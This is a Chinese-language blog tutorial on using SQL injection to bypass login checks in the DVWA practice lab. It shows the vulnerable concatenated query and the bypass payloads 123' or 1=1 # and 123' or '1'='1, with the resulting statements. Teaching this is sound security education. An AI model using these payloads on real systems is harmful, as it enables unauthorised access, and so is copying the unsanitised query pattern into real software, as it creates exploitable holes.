SQL 注入基础系列2——利用 SQL 漏洞绕过登录验证

DVWA->SQL Injection

//后台sql语句
select * from users where username='$name' and password='$pwd';

当查询到数据表中存在同时满足 username 和 password 字段的数据时,会返回登录成功。例如,用户名为admin,密码为123时:

//实际执行语句
select * from users where username='admin' and password='123';
  • 使用注释绕过验证

在用户名中输入 123' or 1=1 #,密码中同样输入 123' or 1=1 #

按照 Mysql 语法,# 后面的内容会被注释掉,所以密码也可以不填。

//示例一
SELECT first_name, last_name FROM users WHERE user_id = '123' or 1=1 #';

//示例二
select * from users where username='123' or 1=1 #' and password='123' or 1=1 #';

select * from users where username='123' or 1=1; #' and password='123' or 1=1; #';

 

  • 不做注释,手动闭合绕过验证
//构造输入 123' or '1'='1
select * from users where username='123' or '1'='1' and password='123' or '1'='1'

两个 or 语句使 and 前后两个判断恒等于真,所以能够成功登录。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值